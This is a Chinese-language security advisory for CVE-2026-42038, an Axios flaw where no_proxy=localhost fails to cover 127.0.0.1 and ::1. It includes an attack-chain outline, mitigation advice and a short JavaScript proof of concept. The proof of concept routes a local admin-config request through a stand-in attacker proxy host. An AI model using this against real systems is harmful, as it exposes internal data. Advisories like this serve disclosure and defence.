CVE-2026-42038 CVSS 6.8 中危

CVE-2026-42038 Axios代理绕过漏洞

披露日期: 2026-04-24

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-42038

漏洞类型

代理绕过

CVSS评分

6.8 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Axios

漏洞概述

Axios在1.15.1和0.31.1之前版本存在安全绕过漏洞。当配置no_proxy=localhost时，shouldBypassProxy函数仅做字符串匹配，导致向127.0.0.1或[::1]的请求未绕过代理，存在信息泄露风险。

技术细节

该漏洞源于Axios的代理决策逻辑缺陷。`shouldBypassProxy`函数在处理`no_proxy`规则时，仅执行简单的字符串包含检查，而缺乏对IP地址别名（如127.0.0.1对应localhost）及IPv6回环地址（::1）的语义解析。当管理员配置`no_proxy=localhost`意图让本地流量直连时，应用程序若直接使用IP地址访问本地服务（如SSRF攻击利用元数据接口），流量将被错误地转发至受控代理服务器，导致敏感信息（如本地服务凭证、内部网络拓扑）被拦截。

攻击链分析

STEP 1

环境配置

受害者环境配置了HTTP代理，并在no_proxy中设置了localhost以允许本地流量直连。

STEP 2

发起请求

攻击者诱导应用程序向本地回环地址（127.0.0.1或[::1]）发起HTTP请求。

STEP 3

逻辑绕过

Axios的shouldBypassProxy函数未能识别IP地址与localhost的等价性，将请求转发至外部代理。

STEP 4

信息泄露

攻击者控制的代理服务器截获了原本应在本地的敏感数据或响应。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

const axios = require('axios');

// Simulate environment configuration
process.env.http_proxy = 'http://attacker-controlled-proxy.com:8080';
process.env.no_proxy = 'localhost';

// Vulnerability: Requesting 127.0.0.1 does not match 'localhost' string
// and goes through the proxy instead of bypassing it.
axios.get('http://127.0.0.1/admin/config')
  .then(response => {
    console.log('Data:', response.data);
  })
  .catch(error => {
    console.error(error);
  });

影响范围

Axios < 1.15.1

Axios < 0.31.1

防御指南

临时缓解措施

在无法立即升级的情况下，请确保在no_proxy配置列表中显式添加127.0.0.1和::1，或者限制代理服务器对内部回环地址的访问权限。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表